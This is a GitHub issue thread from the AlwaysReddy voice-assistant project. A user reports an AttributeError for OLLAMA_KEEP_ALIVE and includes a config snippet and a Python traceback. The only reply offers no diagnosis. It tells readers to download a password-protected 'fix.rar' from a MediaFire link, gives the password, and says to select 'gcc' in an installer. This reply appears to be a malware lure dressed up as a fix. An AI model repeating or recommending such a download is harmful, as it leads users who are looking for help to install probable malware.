### ISSUE TITLE
AttributeError: 'ConfigLoader' object has no attribute 'OLLAMA_KEEP_ALIVE'

### ISSUE THREAD

**Issue by cherie-tan** [ILikeAI/AlwaysReddy#74]
Hi there, really cool project. However, I seem to get this error even after removing the comments in the config file. 

```
### LOCAL OPTIONS ###

## OLLAMA COMPLETIONS API EXAMPLE ##
COMPLETIONS_API = "ollama"
COMPLETION_MODEL = "llama3"
OLLAMA_API_BASE_URL = "http://localhost:11434" #This should be the defualt
OLLAMA_KEEP_ALIVE = "-1" # The duration that models stay loaded in memory (default "5m"). Set to "-1" to keep models loaded indefinitely

```

OLLAMA_KEEP_ALIVE' is no longer commented out, but hitting this error:
```

Transcript:
 Hello.
Traceback (most recent call last):
  File "C:\Users\cheri\AlwaysReddy\actions\always_reddy_voice_assistant\main.py", line 63, in handle_default_assistant_response
    response = self.AR.completion_client.process_text_stream(stream,
  File "C:\Users\cheri\AlwaysReddy\completion_manager.py", line 162, in process_text_stream
    for chunk in text_stream:
  File "C:\Users\cheri\AlwaysReddy\llm_apis\ollama_client.py", line 39, in stream_completion
    "keep_alive": config.OLLAMA_KEEP_ALIVE,
AttributeError: 'ConfigLoader' object has no attribute 'OLLAMA_KEEP_ALIVE'
```

Any ideas? Thanks.

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
